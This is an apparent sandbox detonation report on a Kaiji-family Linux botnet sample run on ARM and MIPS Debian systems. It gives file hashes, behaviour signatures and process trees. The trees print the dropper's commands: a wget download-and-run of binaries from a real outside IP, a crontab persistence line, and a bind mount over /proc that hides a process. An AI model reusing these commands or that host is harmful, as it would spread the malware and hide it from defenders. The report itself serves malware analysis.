SHA256 c09b6758cad544622f1a8a0e5edb64af4b952eb95ae94dcfe20fc1af2a9ab7e4
SHA512 7a88709312bfdf50b3900abeab5e916fcbb63e773b58e158b557f239d1e8b861c4294dd86cfec80e4baf199fcb606d484da991c7b42594ec8999f945a4afb154

/etc/.walk

MD5 7b6092eb341d814a12c0772fcbd2e4c5
SHA1 af07165fcaecae523111049ad61a67eff08183ec
SHA256 07520ca9930e4658a481259f546f4ec55912d7968b019441fc18309d23c29f97
SHA512 0365451fae150c11bda418fea8c993e8ca6528b0818a78e1c4b91757e5fb458499cc2d4ac7dacb4725082686d2d6c88cb46f2676f4961e757fa57d36464d91a6

/etc/.walk

MD5 9835effe62d8a1b41f6a6cd8057fd113
SHA1 71145150b1d03bfb36f277f7604c539442c30c05
SHA256 a3834cd0bd816bc3b28e9d2cc3dca12af6d717c3a94ee35d4ef5e0e4d6e635a0
SHA512 6b6e99977dff5c41e96e2c54e2326a562ff762fae54a472205aad3bf069bb6b3c0a1948840e65e9260c44794e1f19f47eceb6c44cc9a09f61f19dbe73930b47f

/etc/32676

MD5 585f408444cbca746945f0cb63f2c3f0
SHA1 0e44bae17174f04514e770ca7fc4bec1007e39cd
SHA256 ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
SHA512 022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596

/.mod

MD5 f5a3713282e43c200f30342f5ff5e2ea
SHA1 2b2ce1a207e2b691a074c6f78f71c4785aae426a
SHA256 6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
SHA512 5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013

/usr/bin/include/find

MD5 f11b2b59639b1edcb46026472786c747
SHA1 a6fe59e11456bc7f19e28b38aa9c1f9c1a13b70d
SHA256 189fbf2416c8205430d8eaa85e2947bc15504ca335ad4a77ec668ff3cbf9c84a
SHA512 1967f43b4b274e2afbc30e8e1bad314085e488066b22233e6ec033dbae10ae111320296b9d429e94cb3079636a37e433aeac928b4ef23a56dedae1741815416b

/usr/bin/include/lsof

MD5 e093dc78225e2a0a25e3b137c1c1e442
SHA1 c29497cfaae729eb576875e4fdfa400640ab16be
SHA256 1190f4dbc7be174de8fd4096c9bf7a28eebfac937d308b7cc533be4a1240d26e
SHA512 fe1cc7a65327732eaaee89f427c10239ba822430e34177842f4681068d78d404b1830d808a2a71b1efcc5f126c6d8c053512237421173aaa150e215a672da6f0

/etc/profile.d/gateway.sh

MD5 fd68e894a07448b5229049cfad5ca5c8
SHA1 85f443429161fa1c111d69b308fd6d744cdef85c
SHA256 7d5fd87e6a3a6a9fe3783eeef0dd9fae0d412abbd625daed9dc06f6d7438e384
SHA512 d5f6213e3c361563f3ad318e3454c80e47ef19bcdbd8fa1875a3e83179e2091c2bd913c623322bc19c5064dfd09c8c2919cf68fcbd898d62e7d872cc7b6b17e3

Analysis: behavioral2

Detonation Overview

Submitted

2025-04-16 18:46

Reported

2025-04-16 18:49

Platform

debian9-armhf-20240418-en

Max time kernel

149s

Max time network

148s

Command Line

[/tmp/download.sh]

Signatures

Kaiji

Description Indicator Process Target
N/A N/A N/A N/A

Kaiji family

kaiji

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/linux_arm7 /tmp/download.sh N/A
N/A /tmp/linux_arm7 /tmp/linux_arm7 N/A
N/A /etc/32676 /bin/sh N/A

Modifies Watchdog functionality

defense_evasion
Description Indicator Process Target
File opened for modification /dev/watchdog /tmp/linux_arm7 N/A
File opened for modification /dev/misc/watchdog /tmp/linux_arm7 N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/sh N/A

Creates/modifies environment variables

persistence privilege_escalation defense_evasion
Description Indicator Process Target
File opened for modification /etc/profile.d/bash_cfg /tmp/linux_arm7 N/A
File opened for modification /etc/profile.d/bash_cfg.sh /tmp/linux_arm7 N/A
File opened for modification /etc/profile.d/gateway.sh /tmp/linux_arm7 N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/kmod /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/sudo /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/alsa-utils /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/cron /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/hwclock.sh /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/networking /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/ssh /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/udev /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/auditd /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/console-setup.sh /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/keyboard-setup.sh /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/procps /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/rsyslog /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/selinux-autorelabel /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/x11-common /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/dbus /tmp/linux_arm7 N/A
File opened for modification /etc/init.d/exim4 /tmp/linux_arm7 N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/bin/include/find /tmp/linux_arm7 N/A
File opened for modification /usr/bin/find /tmp/linux_arm7 N/A

Modifies Bash startup script

persistence
Description Indicator Process Target
File opened for modification /etc/profile.d/bash_cfg.sh /tmp/linux_arm7 N/A
File opened for modification /etc/profile.d/gateway.sh /tmp/linux_arm7 N/A
File opened for modification /etc/profile.d/bash_cfg /tmp/linux_arm7 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 /tmp/linux_arm7 N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_arm7 N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_arm7 N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/301/stat /tmp/linux_arm7 N/A
File opened for reading /proc/816/stat /tmp/linux_arm7 N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/635/stat /tmp/linux_arm7 N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/637/stat /tmp/linux_arm7 N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/588/stat /tmp/linux_arm7 N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/814/stat /tmp/linux_arm7 N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/807/stat /tmp/linux_arm7 N/A
File opened for reading /proc/727/stat /tmp/linux_arm7 N/A
File opened for reading /proc/847/stat /tmp/linux_arm7 N/A
File opened for reading /proc/630/stat /tmp/linux_arm7 N/A
File opened for reading /proc/720/stat /tmp/linux_arm7 N/A
File opened for reading /proc/849/stat /tmp/linux_arm7 N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/mount N/A
File opened for reading /proc/314/stat /tmp/linux_arm7 N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/854/stat /tmp/linux_arm7 N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/linux_arm7 /usr/bin/wget N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/bin/rm

[rm -f linux_arm7]

/usr/bin/wget

[wget -t 1 http://154.40.47.248:8000/linux_arm7]

/bin/chmod

[chmod +x linux_arm7]

/tmp/linux_arm7

[./linux_arm7]

/tmp/linux_arm7

[./linux_arm7 ]

/bin/rm

[/bin/rm /tmp/download.sh]

/bin/sh

[/bin/sh -c /etc/32676&]

/usr/sbin/service

[service crond start]

/etc/32676

[/etc/32676]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sleep

[sleep 60]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start crond.service]

/usr/local/bin/systemctl

[systemctl start crond.service]

/usr/sbin/systemctl

[systemctl start crond.service]

/usr/bin/systemctl

[systemctl start crond.service]

/sbin/systemctl

[systemctl start crond.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sh

[/bin/sh -c echo "*/1 * * * * root /.mod " >> /etc/crontab]

/usr/bin/renice

[renice -20 720]

/bin/mount

[mount -o bind /tmp/ /proc/720]

/usr/sbin/service

[service cron start]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start cron.service]

/usr/local/bin/systemctl

[systemctl start cron.service]

/usr/sbin/systemctl

[systemctl start cron.service]

/usr/bin/systemctl

[systemctl start cron.service]

/sbin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start cron.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sleep

[sleep 60]

/bin/sleep

[sleep 60]

Network

Country Destination Domain Proto
US 154.40.47.248:8000 154.40.47.248 tcp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
AU 1.1.1.1:53 www.google.com udp
US 154.40.47.248:888 tcp

Files

/tmp/linux_arm7

MD5 9c069085ca52a2acca2bf52f1171a7da
SHA1 5c6a4714a083dcb6a44adb2043705d65a4ec61ad
SHA256 1934d283e13ddcbe0c1c85e4d41d7c27a1261b0f0d9302451b042952e2708a3e
SHA512 07a87d09d1711c23b95a904d47aa003dfca41fde7af2b3e220bf1dc8f4a4ae4c4ddb2394150652ac50afde4810250418172fdeb7859a664751be5e80354e5034

/etc/.walk

MD5 dc6394a4d22242b33f9d43a96ffe3502
SHA1 54824f7e446db91a6670d0d552d0ff41d767e9d1
SHA256 e922d8377bf3bf26579efe87cdda038e2f10c5e597b2aba7677bc921bd848215
SHA512 1ea735fd1abaf67eecadec35a04763a836fe11674d38976ef076883207d1708097e0dd8371e91c30a8fa2c0525da0dc2ba703b30497b279c0206e6ffcb88dd0d

/etc/.walk

MD5 6179c060af048542f9426ec07bd2d841
SHA1 ab4421ac24e1481d4334862e7ceb979144d3535a
SHA256 c742581cef7f919ce2516918c50022ad11da00889fff78bceed7d36f456c1b45
SHA512 2ebf226a7c6e8cf252bd216036ea983fb67ba244d9a2bdb5c8d202e80a5a6feeb5d6915def4be9894d0b6acdbb85ad0177a9aac7cb2e819d340b5bb316d2c00f

/etc/32676

MD5 585f408444cbca746945f0cb63f2c3f0
SHA1 0e44bae17174f04514e770ca7fc4bec1007e39cd
SHA256 ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
SHA512 022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596

/.mod

MD5 f5a3713282e43c200f30342f5ff5e2ea
SHA1 2b2ce1a207e2b691a074c6f78f71c4785aae426a
SHA256 6ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
SHA512 5bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013

/usr/bin/include/find

MD5 138a27d6fe52fa1132760a4fa48922e0
SHA1 e0250e4d7bf33a5a1064344224148b889cb15138
SHA256 81a10dad907b23521461bd3fc83c2cedb2218933a328d9a05e3c9f6a9a1d42aa
SHA512 ee0078afad63fc2aaffdebb7127d1c7d4459287fee75358f57c82d397c39b7bf64338fb6996dfb1747cd9a896d714b3c76f0948727be91550f1affa1c0298a9e

/etc/profile.d/gateway.sh

MD5 522cadedcca724421b27f68657bd69b0
SHA1 b42741c0734f3662d0a0c2690b7ef6414bcda4e0
SHA256 836cd5eee60bdb3444bc37e4a3a4db97791b55f86f7e416718c909522a93ebe8
SHA512 1ce9b1814deb5a51f6945739c66207ba2eea139b567073e4e9c63eeedf37c327f4ac87f8adc0db6eb96a483e2621d13e663e492e2d71191537e807b38e2c9b35

Analysis: behavioral3

Detonation Overview

Submitted

2025-04-16 18:46

Reported

2025-04-16 18:49

Platform

debian9-mipsbe-20240729-en

Max time kernel

150s

Max time network

148s

Command Line

[/tmp/download.sh]

Signatures

Kaiji

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Kaiji family

kaiji

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/linux_mips /tmp/download.sh N/A
N/A /tmp/linux_mips /tmp/linux_mips N/A
N/A /etc/32676 /bin/sh N/A
N/A /tmp/linux_mipsel /tmp/download.sh N/A

Creates/modifies Cron job

execution persistence privilege_escalation
Description Indicator Process Target
File opened for modification /etc/crontab /bin/sh N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 /tmp/linux_mips N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A
N/A N/A /bin/sh N/A

Enumerates kernel/hardware configuration

discovery
Description Indicator Process Target
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_mips N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size /tmp/linux_mips N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A
File opened for reading /sys/fs/kdbus/0-system/bus /bin/systemctl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/mount N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/sed N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/1/environ /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/self/stat /bin/systemctl N/A
File opened for reading /proc/cmdline /bin/systemctl N/A
File opened for reading /proc/filesystems /bin/systemctl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/linux_mips N/A
N/A N/A /tmp/linux_mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/linux_mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/linux_mips /usr/bin/wget N/A
File opened for modification /tmp/linux_mipsel /usr/bin/wget N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/bin/uname

[uname -s]

/bin/uname

[uname -m]

/bin/rm

[rm -f linux_mips]

/usr/bin/wget

[wget -t 1 http://154.40.47.248:8000/linux_mips]

/bin/chmod

[chmod +x linux_mips]

/tmp/linux_mips

[./linux_mips]

/tmp/linux_mips

[./linux_mips ]

/bin/rm

[rm -f linux_mipsel]

/usr/bin/wget

[wget -t 1 http://154.40.47.248:8000/linux_mipsel]

/bin/sh

[/bin/sh -c /etc/32676&]

/etc/32676

[/etc/32676]

/usr/sbin/service

[service crond start]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/sleep

[sleep 60]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/chmod

[chmod +x linux_mipsel]

/tmp/linux_mipsel

[./linux_mipsel]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/rm

[rm -f linux_mipsel]

/bin/rm

[/bin/rm /tmp/download.sh]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-control.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-udevd-kernel.socket]

/usr/local/sbin/systemctl

[systemctl start crond.service]

/usr/local/bin/systemctl

[systemctl start crond.service]

/usr/sbin/systemctl

[systemctl start crond.service]

/usr/bin/systemctl

[systemctl start crond.service]

/sbin/systemctl

[systemctl start crond.service]

/bin/systemctl

[systemctl start crond.service]

/bin/sh

[/bin/sh -c echo "*/1 * * * * root /.mod " >> /etc/crontab]

/usr/bin/renice

[renice -20 785]

/bin/mount

[mount -o bind /tmp/ /proc/785]

/usr/sbin/service

[service cron start]

/usr/bin/basename

[basename /usr/sbin/service]

/usr/bin/basename

[basename /usr/sbin/service]

/bin/systemctl

[systemctl --quiet is-active multi-user.target]

/bin/systemctl

[systemctl list-unit-files --full --type=socket]

/bin/sed

[sed -ne s/\.socket\s*[a-z]*\s*$/.socket/p]

/bin/systemctl

[systemctl -p Triggers show dbus.socket]

/bin/systemctl

[systemctl -p Triggers show ssh.socket]

/bin/systemctl

[systemctl -p Triggers show syslog.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-fsckd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-initctl.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-audit.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald-dev-log.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-journald.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-networkd.socket]

/bin/systemctl

[systemctl -p Triggers show systemd-rfkill.socket]

/bin/systemctl

